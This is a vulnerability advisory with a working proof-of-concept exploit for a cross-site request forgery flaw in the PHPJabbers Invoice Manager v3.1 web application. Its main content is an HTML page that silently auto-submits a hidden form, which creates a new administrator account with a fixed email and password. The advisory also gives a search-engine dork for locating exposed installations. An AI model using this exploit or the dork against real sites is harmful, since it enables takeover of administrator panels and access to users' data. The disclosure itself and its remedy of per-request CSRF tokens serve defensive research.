68 lines
No EOL
2.9 KiB
HTML
68 lines
No EOL
2.9 KiB
HTML
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
|
|
|
|
<!--
|
|
# Exploit Title: Invoice Manager v3.1 - Cross site request forgery (Add Admin)
|
|
# Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
|
|
# Dork: inurl:controller=pjAdmin
|
|
# Date: 30.08.2017
|
|
# Homepage: https://www.phpjabbers.com/invoice-manager/
|
|
# Software Demo Link: http://demo.phpjabbers.com/1504048815_513/index.php?controller=pjAdmin&action=pjActionLogin
|
|
# Version: 3.1
|
|
# Category: Webapps /php
|
|
# Tested on: mozila firefox
|
|
#
|
|
#
|
|
-->
|
|
|
|
# ========================================================
|
|
#
|
|
#
|
|
# Invoice Manager v3.1 Cross site request forgery (Add Admin)
|
|
#
|
|
# Description : Invoice Manager v3.1 is vulnerable to CSRF attack (No CSRF token in place) which if an admin user can be
|
|
# tricked to visit a crafted URL created by attacker (via spear phishing/social engineering).
|
|
# Once exploited, the attacker can login as the admin using the email and the password in the below exploit.
|
|
#
|
|
#
|
|
# ======================CSRF POC (Adding New user with Administrator Privileges)==================================
|
|
|
|
|
|
<html>
|
|
<body>
|
|
<form name="csrf_form" action="http://localhost/invoice/index.php?controller=pjAdminUsers&action=pjActionCreate" method="post">
|
|
|
|
<input name="user_create" id="user_create" value="1" type="hidden">
|
|
<input name="role_id" id="role_id" value="1" type="hidden" >
|
|
<input name="email" id="email" value="AliBawazeEer@localhost.com" type="hidden">
|
|
<input name="password" id="password" value="12341234" type="hidden">
|
|
<input name="name" id="name" value="Ali BawazeEer" type="hidden">
|
|
<input name="phone" id="phone" value="911911911" type="hidden">
|
|
<input name="status" id="status" value="T" type="hidden">
|
|
<script type="text/javascript">document.csrf_form.submit();</script>
|
|
</body>
|
|
</html>
|
|
|
|
# =================================================EOF =======================================================
|
|
#
|
|
#
|
|
# Risk : attackers are able to gain full access to the administrator panel after chaning the password for the admin
|
|
# and thus have total control over the web application, including content change,and change user's account download backup of the site access to user's data..
|
|
#
|
|
#
|
|
# Remedy : developer should implement CSRF token for each request
|
|
#
|
|
#
|
|
#
|
|
# ========================================================
|
|
# [+] Disclaimer
|
|
#
|
|
# Permission is hereby granted for the redistribution of this advisory,
|
|
# provided that it is not altered except by reformatting it, and that due
|
|
# credit is given. Permission is explicitly given for insertion in
|
|
# vulnerability databases and similar, provided that due credit is given to
|
|
# the author. The author is not responsible for any misuse of the information contained
|
|
# herein and prohibits any malicious use of all security related information
|
|
# or exploits by the author or elsewhere.
|
|
#
|
|
#
|
|
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # |